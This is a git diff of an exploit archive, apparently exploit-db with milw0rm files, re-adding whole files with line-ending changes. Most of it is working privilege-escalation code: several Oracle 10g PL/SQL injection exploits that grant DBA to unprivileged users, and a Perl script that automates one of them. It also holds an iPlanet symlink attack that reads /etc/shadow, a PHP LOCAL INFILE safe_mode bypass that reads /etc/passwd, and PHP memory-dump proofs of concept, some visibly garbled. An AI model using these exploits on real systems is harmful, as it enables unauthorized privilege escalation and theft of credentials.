a/platforms/multiple/local/1719.txt b/platforms/multiple/local/1719.txt index a16dd963a..332925084 100755 --- a/platforms/multiple/local/1719.txt +++ b/platforms/multiple/local/1719.txt @@ -1,60 +1,60 @@ -/* 0day, description is wrong. /str0ke */ - -/* -* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0 -* -* Patch your database now! -* -* by N1V1Hd $3c41r3 -* -*/ - -CREATE OR REPLACE -PACKAGE MYBADPACKAGE AUTHID CURRENT_USER -IS -FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 -VARCHAR2,p4 VARCHAR2,env SYS.odcienv) -RETURN NUMBER; -END; -/ - -CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE -IS -FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 -VARCHAR2,p4 VARCHAR2,env SYS.odcienv) -RETURN NUMBER -IS -pragma autonomous_transaction; -BEGIN -EXECUTE IMMEDIATE 'GRANT DBA TO HACKER'; -COMMIT; -RETURN(1); -END; - -END; -/ - -DECLARE -INDEX_NAME VARCHAR2(200); -INDEX_SCHEMA VARCHAR2(200); -TYPE_NAME VARCHAR2(200); -TYPE_SCHEMA VARCHAR2(200); -VERSION VARCHAR2(200); -NEWBLOCK PLS_INTEGER; -GMFLAGS NUMBER; -v_Return VARCHAR2(200); -BEGIN -INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER'; -TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER'; -VERSION := '10.2.0.2.0'; GMFLAGS := 1; - -v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA( -INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME -=> TYPE_NAME, -TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK => -NEWBLOCK, GMFLAGS => GMFLAGS -); -END; -/ - -// milw0rm.com [2006-04-26] +/* 0day, description is wrong. /str0ke */ + +/* +* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0 +* +* Patch your database now! +* +* by N1V1Hd $3c41r3 +* +*/ + +CREATE OR REPLACE +PACKAGE MYBADPACKAGE AUTHID CURRENT_USER +IS +FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 +VARCHAR2,p4 VARCHAR2,env SYS.odcienv) +RETURN NUMBER; +END; +/ + +CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE +IS +FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 +VARCHAR2,p4 VARCHAR2,env SYS.odcienv) +RETURN NUMBER +IS +pragma autonomous_transaction; +BEGIN +EXECUTE IMMEDIATE 'GRANT DBA TO HACKER'; +COMMIT; +RETURN(1); +END; + +END; +/ + +DECLARE +INDEX_NAME VARCHAR2(200); +INDEX_SCHEMA VARCHAR2(200); +TYPE_NAME VARCHAR2(200); +TYPE_SCHEMA VARCHAR2(200); +VERSION VARCHAR2(200); +NEWBLOCK PLS_INTEGER; +GMFLAGS NUMBER; +v_Return VARCHAR2(200); +BEGIN +INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER'; +TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER'; +VERSION := '10.2.0.2.0'; GMFLAGS := 1; + +v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA( +INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME +=> TYPE_NAME, +TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK => +NEWBLOCK, GMFLAGS => GMFLAGS +); +END; +/ + +// milw0rm.com [2006-04-26] diff --git a/platforms/multiple/local/1924.txt b/platforms/multiple/local/1924.txt index d47b61862..eca3c9074 100755 --- a/platforms/multiple/local/1924.txt +++ b/platforms/multiple/local/1924.txt @@ -1,56 +1,56 @@ -Date: 14 Jun 2006 -Vendor: Sun Microsystems, Inc. -Name: iPlanet Messaging Server -Version: 5.2 HotFix 1.16 (built May 14 2003) -Vuln: msg.conf symlink attack -Severity: high - - -Software description ----------------- -The iPlanet Messaging Server is a software product that provides a -centralized location for the exchange of information through the sending -and receiving of messages. The product is designed for -telecommunications providers, service providers, and enterprises that -offer messaging capabilities to employees, partners, and customers. The -iPlanet Messaging Server delivers a Web-based messaging platform capable -of serving tens of millions of users, and also provides value-added -differentiated services, including outsourcing, wireless ,and unified -messaging services. - - -Vulnerability desciption ----------------- -Setuid programs part of the iPlanet Messaging Server try to read the -configuration file msg.conf. -If the environment variable CONFIGROOT is set, the configuration is read -from that directory. -A symlink attack is possible, and as a result it is possible to read the -first line of any file with uid=0. - -Example ----------------- -test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/version -iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003) -libimta.so 5.2 HotFix 1.16 (built 12:32:17, May 14 2003) -SunOS sunbox 5.9 Generic_118558-22 sun4u sparc SUNW,Sun-Fire-280R Solaris -test@sunbox:/tmp$ -test@sunbox:/tmp$ ls -la /iplanet/iMS5/bin/msg/imta/bin/pipe_master --rws--s--x 1 root mail 446864 Sep 22 2005 /iplanet/iMS5/bin/msg/imta/bin/pipe_master -test@sunbox:/tmp$ -test@sunbox:/tmp$ ln -s /etc/shadow msg.conf -test@sunbox:/tmp$ -test@sunbox:/tmp$ export CONFIGROOT=. -test@sunbox:/tmp$ -test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/pipe_master -[14/Jun/2006:11:13:49 +0200] sunbox [119]: General Error: func=_configdrv_file_readoption; error=option name should be followed by '='; line=root:qW1HFEa1MCD0w:11821:::::: ERROR: Configuration database initialization failed - see default logfile -test@sunbox:/tmp$ - -Vulnerable ----------------- -iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003) - -php0t / zorro.hu -www.zorro.hu - -# milw0rm.com [2006-06-18] +Date: 14 Jun 2006 +Vendor: Sun Microsystems, Inc. +Name: iPlanet Messaging Server +Version: 5.2 HotFix 1.16 (built May 14 2003) +Vuln: msg.conf symlink attack +Severity: high + + +Software description +---------------- +The iPlanet Messaging Server is a software product that provides a +centralized location for the exchange of information through the sending +and receiving of messages. The product is designed for +telecommunications providers, service providers, and enterprises that +offer messaging capabilities to employees, partners, and customers. The +iPlanet Messaging Server delivers a Web-based messaging platform capable +of serving tens of millions of users, and also provides value-added +differentiated services, including outsourcing, wireless ,and unified +messaging services. + + +Vulnerability desciption +---------------- +Setuid programs part of the iPlanet Messaging Server try to read the +configuration file msg.conf. +If the environment variable CONFIGROOT is set, the configuration is read +from that directory. +A symlink attack is possible, and as a result it is possible to read the +first line of any file with uid=0. + +Example +---------------- +test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/version +iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003) +libimta.so 5.2 HotFix 1.16 (built 12:32:17, May 14 2003) +SunOS sunbox 5.9 Generic_118558-22 sun4u sparc SUNW,Sun-Fire-280R Solaris +test@sunbox:/tmp$ +test@sunbox:/tmp$ ls -la /iplanet/iMS5/bin/msg/imta/bin/pipe_master +-rws--s--x 1 root mail 446864 Sep 22 2005 /iplanet/iMS5/bin/msg/imta/bin/pipe_master +test@sunbox:/tmp$ +test@sunbox:/tmp$ ln -s /etc/shadow msg.conf +test@sunbox:/tmp$ +test@sunbox:/tmp$ export CONFIGROOT=. +test@sunbox:/tmp$ +test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/pipe_master +[14/Jun/2006:11:13:49 +0200] sunbox [119]: General Error: func=_configdrv_file_readoption; error=option name should be followed by '='; line=root:qW1HFEa1MCD0w:11821:::::: ERROR: Configuration database initialization failed - see default logfile +test@sunbox:/tmp$ + +Vulnerable +---------------- +iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003) + +php0t / zorro.hu +www.zorro.hu + +# milw0rm.com [2006-06-18] diff --git a/platforms/multiple/local/288.c b/platforms/multiple/local/288.c index 09f3a951d..426204543 100755 --- a/platforms/multiple/local/288.c +++ b/platforms/multiple/local/288.c @@ -108,6 +108,6 @@ int main(int argc, char *argv[]) return 0; } - - -// milw0rm.com [2001-03-04] + + +// milw0rm.com [2001-03-04] diff --git a/platforms/multiple/local/3177.txt b/platforms/multiple/local/3177.txt index 77d146e21..e6d4f5b75 100755 --- a/platforms/multiple/local/3177.txt +++ b/platforms/multiple/local/3177.txt @@ -1,46 +1,46 @@ -/** -* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006 -* Joxean Koret -* Privileges needed: -* -* - CREATE SESSION -* -* Max. Length 97. Very, very cool -* -*/ -select * -from user_role_privs -; - -DECLARE -SEQUENCE_OWNER VARCHAR2(200); -SEQUENCE_NAME VARCHAR2(200); -v_user_id number; -v_commands VARCHAR2(32767); -NEW_VALUE NUMBER; -BEGIN -SELECT user_id INTO v_user_id -FROM user_users; - -v_commands := 'insert into sys.sysauth$ ' || -' values' || -'(' || v_user_id || ',4,' || -'999,null)'; - -SEQUENCE_OWNER := 'TEST'; -SEQUENCE_NAME := ''',lockhandle=>:1);' || v_commands || ';commit; -end;--'; -NEW_VALUE := 1; -SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE( -SEQUENCE_OWNER => SEQUENCE_OWNER, -SEQUENCE_NAME => SEQUENCE_NAME, -NEW_VALUE => NEW_VALUE -); -END; -/ - -select * -from user_role_privs -; - -// milw0rm.com [2007-01-23] +/** +* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006 +* Joxean Koret +* Privileges needed: +* +* - CREATE SESSION +* +* Max. Length 97. Very, very cool +* +*/ +select * +from user_role_privs +; + +DECLARE +SEQUENCE_OWNER VARCHAR2(200); +SEQUENCE_NAME VARCHAR2(200); +v_user_id number; +v_commands VARCHAR2(32767); +NEW_VALUE NUMBER; +BEGIN +SELECT user_id INTO v_user_id +FROM user_users; + +v_commands := 'insert into sys.sysauth$ ' || +' values' || +'(' || v_user_id || ',4,' || +'999,null)'; + +SEQUENCE_OWNER := 'TEST'; +SEQUENCE_NAME := ''',lockhandle=>:1);' || v_commands || ';commit; +end;--'; +NEW_VALUE := 1; +SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE( +SEQUENCE_OWNER => SEQUENCE_OWNER, +SEQUENCE_NAME => SEQUENCE_NAME, +NEW_VALUE => NEW_VALUE +); +END; +/ + +select * +from user_role_privs +; + +// milw0rm.com [2007-01-23] diff --git a/platforms/multiple/local/3178.txt b/platforms/multiple/local/3178.txt index 2a9b5cfc6..7e7368bb8 100755 --- a/platforms/multiple/local/3178.txt +++ b/platforms/multiple/local/3178.txt @@ -1,42 +1,42 @@ -/** -* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006 -* Joxean Koret -* Privileges needed: -* -* - CREATE SESSION -* - CREATE PROCEDURE -* -*/ -select * -from user_role_privs -; - -CREATE OR REPLACE FUNCTION F1 -RETURN NUMBER AUTHID CURRENT_USER -IS -PRAGMA AUTONOMOUS_TRANSACTION; -BEGIN -EXECUTE IMMEDIATE 'GRANT DBA TO TEST'; -COMMIT; -RETURN(1); -END; -/ - -DECLARE -MASTER_NAME VARCHAR2(200); -MASTER_OWNER VARCHAR2(200); -BEGIN -MASTER_NAME := ''' or ' || user || '.f1=1--'; -MASTER_OWNER := 'bla'; -SYS.KUPW$WORKER.MAIN( -MASTER_NAME => MASTER_NAME, -MASTER_OWNER => MASTER_OWNER -); -END; -/ - -select * -from user_role_privs -; - -// milw0rm.com [2007-01-23] +/** +* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006 +* Joxean Koret +* Privileges needed: +* +* - CREATE SESSION +* - CREATE PROCEDURE +* +*/ +select * +from user_role_privs +; + +CREATE OR REPLACE FUNCTION F1 +RETURN NUMBER AUTHID CURRENT_USER +IS +PRAGMA AUTONOMOUS_TRANSACTION; +BEGIN +EXECUTE IMMEDIATE 'GRANT DBA TO TEST'; +COMMIT; +RETURN(1); +END; +/ + +DECLARE +MASTER_NAME VARCHAR2(200); +MASTER_OWNER VARCHAR2(200); +BEGIN +MASTER_NAME := ''' or ' || user || '.f1=1--'; +MASTER_OWNER := 'bla'; +SYS.KUPW$WORKER.MAIN( +MASTER_NAME => MASTER_NAME, +MASTER_OWNER => MASTER_OWNER +); +END; +/ + +select * +from user_role_privs +; + +// milw0rm.com [2007-01-23] diff --git a/platforms/multiple/local/3179.txt b/platforms/multiple/local/3179.txt index 8cfb70225..d28c03923 100755 --- a/platforms/multiple/local/3179.txt +++ b/platforms/multiple/local/3179.txt @@ -1,42 +1,42 @@ -/** -* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006 -* Joxean Koret -* Privileges needed: -* -* - EXECUTE_CATALOG_ROLE -* - CREATE PROCEDURE -* -*/ -select * -from user_role_privs -; - -CREATE OR REPLACE FUNCTION F1 -RETURN NUMBER AUTHID CURRENT_USER -IS -PRAGMA AUTONOMOUS_TRANSACTION; -BEGIN -EXECUTE IMMEDIATE 'GRANT DBA TO TEST'; -COMMIT; -RETURN(1); -END; -/ - -DECLARE -USER_NAME VARCHAR2(200); -JOB_NAME VARCHAR2(200); -NEW_JOB BOOLEAN; -v_Return NUMBER; -BEGIN -USER_NAME := 'OWNER'; -JOB_NAME := ''' OR ' || USER || '.f1() = 1--'; - -v_Return := SYS.KUPV$FT.ATTACH_JOB( -USER_NAME => USER_NAME, -JOB_NAME => JOB_NAME, -NEW_JOB => NEW_JOB -); -END; -/ - -// milw0rm.com [2007-01-23] +/** +* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006 +* Joxean Koret +* Privileges needed: +* +* - EXECUTE_CATALOG_ROLE +* - CREATE PROCEDURE +* +*/ +select * +from user_role_privs +; + +CREATE OR REPLACE FUNCTION F1 +RETURN NUMBER AUTHID CURRENT_USER +IS +PRAGMA AUTONOMOUS_TRANSACTION; +BEGIN +EXECUTE IMMEDIATE 'GRANT DBA TO TEST'; +COMMIT; +RETURN(1); +END; +/ + +DECLARE +USER_NAME VARCHAR2(200); +JOB_NAME VARCHAR2(200); +NEW_JOB BOOLEAN; +v_Return NUMBER; +BEGIN +USER_NAME := 'OWNER'; +JOB_NAME := ''' OR ' || USER || '.f1() = 1--'; + +v_Return := SYS.KUPV$FT.ATTACH_JOB( +USER_NAME => USER_NAME, +JOB_NAME => JOB_NAME, +NEW_JOB => NEW_JOB +); +END; +/ + +// milw0rm.com [2007-01-23] diff --git a/platforms/multiple/local/321.c b/platforms/multiple/local/321.c index 9de556b6e..9496ed389 100755 --- a/platforms/multiple/local/321.c +++ b/platforms/multiple/local/321.c @@ -58,6 +58,6 @@ main(int argc, char **argv) (void)alarm((u_int)0); execl(PATH_MOUNT, "umount", buff, NULL); } - - -// milw0rm.com [1996-08-13] + + +// milw0rm.com [1996-08-13] diff --git a/platforms/multiple/local/3413.php b/platforms/multiple/local/3413.php index 01cad354a..09c6d3a77 100755 --- a/platforms/multiple/local/3413.php +++ b/platforms/multiple/local/3413.php @@ -1,56 +1,56 @@ - 127 || $c < 32) { - $c = ord("."); - } - printf ("%c", $c); - } - printf("\n"); - } -?> - -# milw0rm.com [2007-03-04] + 127 || $c < 32) { + $c = ord("."); + } + printf ("%c", $c); + } + printf("\n"); + } +?> + +# milw0rm.com [2007-03-04] diff --git a/platforms/multiple/local/3414.php b/platforms/multiple/local/3414.php index 9e979f96b..c0ee677c6 100755 --- a/platforms/multiple/local/3414.php +++ b/platforms/multiple/local/3414.php @@ -1,49 +1,49 @@ -
A1"); - - $keys = array_keys($_SESSION); - $stackdump = $keys[1]; - - echo "Stackdump\n---------\n\n"; - - for ($b=0; $b 127 || $c < 32) { - $c = ord("."); - } - printf ("%c", $c); - } - printf("\n"); - } -?> - -# milw0rm.com [2007-03-04] +
A1"); + + $keys = array_keys($_SESSION); + $stackdump = $keys[1]; + + echo "Stackdump\n---------\n\n"; + + for ($b=0; $b 127 || $c < 32) { + $c = ord("."); + } + printf ("%c", $c); + } + printf("\n"); + } +?> + +# milw0rm.com [2007-03-04] diff --git a/platforms/multiple/local/3424.php b/platforms/multiple/local/3424.php index a9395fa2d..6fc797fc0 100755 --- a/platforms/multiple/local/3424.php +++ b/platforms/multiple/local/3424.php @@ -1,69 +1,69 @@ -= 127 || $c < 32) { - $c = ord("."); - } - printf ("%c", $c); - } - printf("\n"); - } - -?> - -# milw0rm.com [2007-03-07] += 127 || $c < 32) { + $c = ord("."); + } + printf ("%c", $c); + } + printf("\n"); + } + +?> + +# milw0rm.com [2007-03-07] diff --git a/platforms/multiple/local/3442.php b/platforms/multiple/local/3442.php index 4ca2bf10a..55a9fcc9d 100755 --- a/platforms/multiple/local/3442.php +++ b/platforms/multiple/local/3442.php @@ -1,86 +1,86 @@ - - -# milw0rm.com [2007-03-09] + + +# milw0rm.com [2007-03-09] diff --git a/platforms/multiple/local/3559.php b/platforms/multiple/local/3559.php index 2406dda09..3cb85c5d3 100755 --- a/platforms/multiple/local/3559.php +++ b/platforms/multiple/local/3559.php @@ -1,56 +1,56 @@ -1,str_repeat('"', 200)."2"=>1); - - $heapdump = unserialize($str); - - - - - echo "Heapdump\n---------\n\n"; - - $len = strlen($heapdump); - for ($b=0; $b<$len; $b+=16) { - printf("%08x: ", $b); - for ($i=0; $i<16; $i++) { - if ($b+$i<$len) { - printf ("%02x ", ord($heapdump[$b+$i])); - } else { - printf (".. "); - } - } - for ($i=0; $i<16; $i++) { - if ($b+$i<$len) { - $c = ord($heapdump[$b+$i]); - } else { - $c = 0; - } - if ($c > 127 || $c < 32) { - $c = ord("."); - } - printf ("%c", $c); - } - printf("\n"); - } -?> - -# milw0rm.com [2007-03-23] +1,str_repeat('"', 200)."2"=>1); + + $heapdump = unserialize($str); + + + + + echo "Heapdump\n---------\n\n"; + + $len = strlen($heapdump); + for ($b=0; $b<$len; $b+=16) { + printf("%08x: ", $b); + for ($i=0; $i<16; $i++) { + if ($b+$i<$len) { + printf ("%02x ", ord($heapdump[$b+$i])); + } else { + printf (".. "); + } + } + for ($i=0; $i<16; $i++) { + if ($b+$i<$len) { + $c = ord($heapdump[$b+$i]); + } else { + $c = 0; + } + if ($c > 127 || $c < 32) { + $c = ord("."); + } + printf ("%c", $c); + } + printf("\n"); + } +?> + +# milw0rm.com [2007-03-23] diff --git a/platforms/multiple/local/4392.txt b/platforms/multiple/local/4392.txt index c528052b4..5cd740636 100755 --- a/platforms/multiple/local/4392.txt +++ b/platforms/multiple/local/4392.txt @@ -1,80 +1,79 @@ - - -Affected Products: -<= PHP 5.2.3 -<= PHP 4.4.7 - -Authors: -Mattias Bengtsson -Philip Olausson - -Reported: -2007-06-05 - -Released: -2007-08-30 - -CVE: -CVE-2007-3997 - -Issue: - -A vulnerability exists in PHP's MySQL and MySQLi extenstions which can be used to bypass PHP's safe_mode security restriction. - -Description: - -PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. - -Details: - -By using MySQLs LOCAL INFILE we could bypass PHP's safe_mode security restriction. An important thing here is that we can't rely on the shared hosts MySQLds local-infile=0 option. This because of it being a server option, so it will not have any effect on the client. To disable this option for MySQL we need to compile libmysqlclient with --disable-local-infile, or remove the CLIENT_LOCAL_FILES flag while connecting. PHP does this when open_basedir are in effect but lacks a check for safe_mode. - -For MySQLi compiling with --disable-local-infile won't help because we could just reenable it with mysqli->options(MYSQLI_OPT_LOCAL_INFILE, 1); - -Proof Of Concepts: - -MySQL: - - - -MySQLi: - -options(MYSQLI_OPT_LOCAL_INFILE, 1); -$m->set_local_infile_handler("r"); -$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a"); -$m->close(); - -?> - -Impact: - -This issue could have major impact on shared hosting systems. - -Solution: - -Upgrade PHP to 5.2.4 or 4.4.8 - -# milw0rm.com [2007-09-10] + +Affected Products: +<= PHP 5.2.3 +<= PHP 4.4.7 + +Authors: +Mattias Bengtsson +Philip Olausson + +Reported: +2007-06-05 + +Released: +2007-08-30 + +CVE: +CVE-2007-3997 + +Issue: + +A vulnerability exists in PHP's MySQL and MySQLi extenstions which can be used to bypass PHP's safe_mode security restriction. + +Description: + +PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. + +Details: + +By using MySQLs LOCAL INFILE we could bypass PHP's safe_mode security restriction. An important thing here is that we can't rely on the shared hosts MySQLds local-infile=0 option. This because of it being a server option, so it will not have any effect on the client. To disable this option for MySQL we need to compile libmysqlclient with --disable-local-infile, or remove the CLIENT_LOCAL_FILES flag while connecting. PHP does this when open_basedir are in effect but lacks a check for safe_mode. + +For MySQLi compiling with --disable-local-infile won't help because we could just reenable it with mysqli->options(MYSQLI_OPT_LOCAL_INFILE, 1); + +Proof Of Concepts: + +MySQL: + + + +MySQLi: + +options(MYSQLI_OPT_LOCAL_INFILE, 1); +$m->set_local_infile_handler("r"); +$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a"); +$m->close(); + +?> + +Impact: + +This issue could have major impact on shared hosting systems. + +Solution: + +Upgrade PHP to 5.2.4 or 4.4.8 + +# milw0rm.com [2007-09-10] diff --git a/platforms/multiple/local/4564.txt b/platforms/multiple/local/4564.txt index 25ad5edb9..138e805a8 100755 --- a/platforms/multiple/local/4564.txt +++ b/platforms/multiple/local/4564.txt @@ -1,69 +1,69 @@ -/******************************************************************/ -/******* Oracle 10g CTX_DOC.MARKUP SQL Injection Exploit **********/ -/******************************************************************/ -/************ sploit grant DBA to unprivileged user ***************/ -/******************************************************************/ -/****************** BY Sh2kerR (Digital Security) ***************/ -/******************************************************************/ -/***************** tested on oracle 10.1.0.2.0 *******************/ -/******************************************************************/ -/******************************************************************/ -/* Date of Public EXPLOIT: October 23, 2007 */ -/* Written by: Alexandr "Sh2kerr" Polyakov */ -/* email: Alexandr.Polyakov@dsec.ru */ -/* site: http://www.dsec.ru */ -/******************************************************************/ -/* Original Advisory by: */ -/* David Litchfield [ davidl@ngssoftware.com ] */ -/* Reported: 6 June 2005 */ -/* Date of Public Advisory: October 17, 2007 */ -/* Advisory number: #NISR17102007A */ -/* */ -/******************************************************************/ - -select * from user_role_privs; - - -CREATE OR REPLACE FUNCTION HACKIT return varchar2 -authid current_user as -pragma autonomous_transaction; -BEGIN -EXECUTE IMMEDIATE 'grant dba to scott'; -COMMIT; -RETURN ''; -END; -/ - - -set serveroutput on - -create table mark_tab (id number primary key, text varchar2(80) ); - -insert into mark_tab values ('1', 'All your bases are belong to US'); - -create index mark_tab_idx on mark_tab(text) - indextype is ctxsys.context parameters - ('filter ctxsys.null_filter'); - - -SET SERVEROUTPUT ON; -DECLARE - mklob CLOB; - amt NUMBER := 40; - line VARCHAR2(80); - BEGIN - CTX_DOC.MARKUP('mark_tab_idx','1',''||scott.HACKIT()||'', mklob); - DBMS_LOB.READ(mklob, amt, 1, line); - DBMS_OUTPUT.PUT_LINE('QWRvcmUuVS5NeS5TdGFy'||line); - DBMS_LOB.FREETEMPORARY(mklob); - END; - / - - -select * from user_role_privs; - -/******************************************************************/ -/*************************** SEE U LATER ;) ***********************/ -/******************************************************************/ - -// milw0rm.com [2007-10-23] +/******************************************************************/ +/******* Oracle 10g CTX_DOC.MARKUP SQL Injection Exploit **********/ +/******************************************************************/ +/************ sploit grant DBA to unprivileged user ***************/ +/******************************************************************/ +/****************** BY Sh2kerR (Digital Security) ***************/ +/******************************************************************/ +/***************** tested on oracle 10.1.0.2.0 *******************/ +/******************************************************************/ +/******************************************************************/ +/* Date of Public EXPLOIT: October 23, 2007 */ +/* Written by: Alexandr "Sh2kerr" Polyakov */ +/* email: Alexandr.Polyakov@dsec.ru */ +/* site: http://www.dsec.ru */ +/******************************************************************/ +/* Original Advisory by: */ +/* David Litchfield [ davidl@ngssoftware.com ] */ +/* Reported: 6 June 2005 */ +/* Date of Public Advisory: October 17, 2007 */ +/* Advisory number: #NISR17102007A */ +/* */ +/******************************************************************/ + +select * from user_role_privs; + + +CREATE OR REPLACE FUNCTION HACKIT return varchar2 +authid current_user as +pragma autonomous_transaction; +BEGIN +EXECUTE IMMEDIATE 'grant dba to scott'; +COMMIT; +RETURN ''; +END; +/ + + +set serveroutput on + +create table mark_tab (id number primary key, text varchar2(80) ); + +insert into mark_tab values ('1', 'All your bases are belong to US'); + +create index mark_tab_idx on mark_tab(text) + indextype is ctxsys.context parameters + ('filter ctxsys.null_filter'); + + +SET SERVEROUTPUT ON; +DECLARE + mklob CLOB; + amt NUMBER := 40; + line VARCHAR2(80); + BEGIN + CTX_DOC.MARKUP('mark_tab_idx','1',''||scott.HACKIT()||'', mklob); + DBMS_LOB.READ(mklob, amt, 1, line); + DBMS_OUTPUT.PUT_LINE('QWRvcmUuVS5NeS5TdGFy'||line); + DBMS_LOB.FREETEMPORARY(mklob); + END; + / + + +select * from user_role_privs; + +/******************************************************************/ +/*************************** SEE U LATER ;) ***********************/ +/******************************************************************/ + +// milw0rm.com [2007-10-23] diff --git a/platforms/multiple/local/4570.pl b/platforms/multiple/local/4570.pl index a98435151..ba49c9c6e 100755 --- a/platforms/multiple/local/4570.pl +++ b/platforms/multiple/local/4570.pl @@ -1,113 +1,113 @@ -#!/usr/bin/perl -# -# http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricset.pl -# -# Oracle SYS.LT.FINDRICSET exploit (11g/10g) -# -# Grant or revoke dba permission to unprivileged user -# -# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.5.0" -# -# Fixed with CPU Oct. 2007 -# -# REF: Thanks to Joxean Koret and his excellent Inguma -# http://sourceforge.net/projects/inguma -# -# AUTHOR: Andrea "bunker" Purificato -# http://rawlab.mindcreations.com -# -# DATE: Copyright 2007 - Fri Oct 26 15:03:46 CEST 2007 -# -# Oracle InstantClient (basic + sdk) required for DBD::Oracle -# -# -# bunker@fin:~$ perl sys-lt-findricset.pl -h localhost -s FAKE -u sfigato -p **** -r -# [-] Wait... -# [-] Revoking DBA from SFIGATO... -# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM SFIGATO"] at sys-lt-findricset.pl line 86. -# [-] Done! -# -# bunker@fin:~$ perl sys-lt-findricset.pl -h localhost -s FAKE -u sfigato -p **** -g -# [-] Wait... -# [-] Creating evil function... -# [-] Go... -# [-] YOU GOT THE POWAH!! -# -# bunker@fin:~$ perl sys-lt-findricset.pl -h localhost -s FAKE -u sfigato -p **** -r -# [-] Wait... -# [-] Revoking DBA from SFIGATO... -# [-] Done! -# - -use warnings; -use strict; -use DBI; -use Getopt::Std; -use vars qw/ %opt /; - -sub usage { - print <<"USAGE"; - -Syntax: $0 -h -s -u -p -g|-r [-P ] - -Options: - -h target server address - -s target sid name - -u user - -p password - - -g|-r (g)rant dba to user | (r)evoke dba from user - [-P Oracle port] - -USAGE - exit 0 -} - -my $opt_string = 'h:s:u:p:grP:'; -getopts($opt_string, \%opt) or &usage; -&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); -&usage if ( !$opt{g} and !$opt{r} ); -my $user = uc $opt{u}; - -my $dbh = undef; -if ($opt{P}) { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; -} else { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; -} - -my $sqlcmd = "GRANT DBA TO $user"; -print "[-] Wait...\n"; - -if ($opt{r}) { - print "[-] Revoking DBA from $user...\n"; - $sqlcmd = "REVOKE DBA FROM $user"; - $dbh->do( $sqlcmd ); - print "[-] Done!\n"; - $dbh->disconnect; - exit; -} - -print "[-] Creating evil function...\n"; -$dbh->do( qq{ -CREATE OR REPLACE FUNCTION OWN RETURN NUMBER - AUTHID CURRENT_USER AS - PRAGMA AUTONOMOUS_TRANSACTION; -BEGIN - EXECUTE IMMEDIATE '$sqlcmd'; COMMIT; - RETURN(0); -END; -} ); - -print "[-] Go...\n"; -my $sth = $dbh->prepare( qq{ -BEGIN - SYS.LT.FINDRICSET('.''||$user.own||'''')--','x'); -END;}); -$sth->execute; -$sth->finish; -print "[-] YOU GOT THE POWAH!!\n"; -$dbh->disconnect; -exit; - -# milw0rm.com [2007-10-27] +#!/usr/bin/perl +# +# http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricset.pl +# +# Oracle SYS.LT.FINDRICSET exploit (11g/10g) +# +# Grant or revoke dba permission to unprivileged user +# +# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.5.0" +# +# Fixed with CPU Oct. 2007 +# +# REF: Thanks to Joxean Koret and his excellent Inguma +# http://sourceforge.net/projects/inguma +# +# AUTHOR: Andrea "bunker" Purificato +# http://rawlab.mindcreations.com +# +# DATE: Copyright 2007 - Fri Oct 26 15:03:46 CEST 2007 +# +# Oracle InstantClient (basic + sdk) required for DBD::Oracle +# +# +# bunker@fin:~$ perl sys-lt-findricset.pl -h localhost -s FAKE -u sfigato -p **** -r +# [-] Wait... +# [-] Revoking DBA from SFIGATO... +# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM SFIGATO"] at sys-lt-findricset.pl line 86. +# [-] Done! +# +# bunker@fin:~$ perl sys-lt-findricset.pl -h localhost -s FAKE -u sfigato -p **** -g +# [-] Wait... +# [-] Creating evil function... +# [-] Go... +# [-] YOU GOT THE POWAH!! +# +# bunker@fin:~$ perl sys-lt-findricset.pl -h localhost -s FAKE -u sfigato -p **** -r +# [-] Wait... +# [-] Revoking DBA from SFIGATO... +# [-] 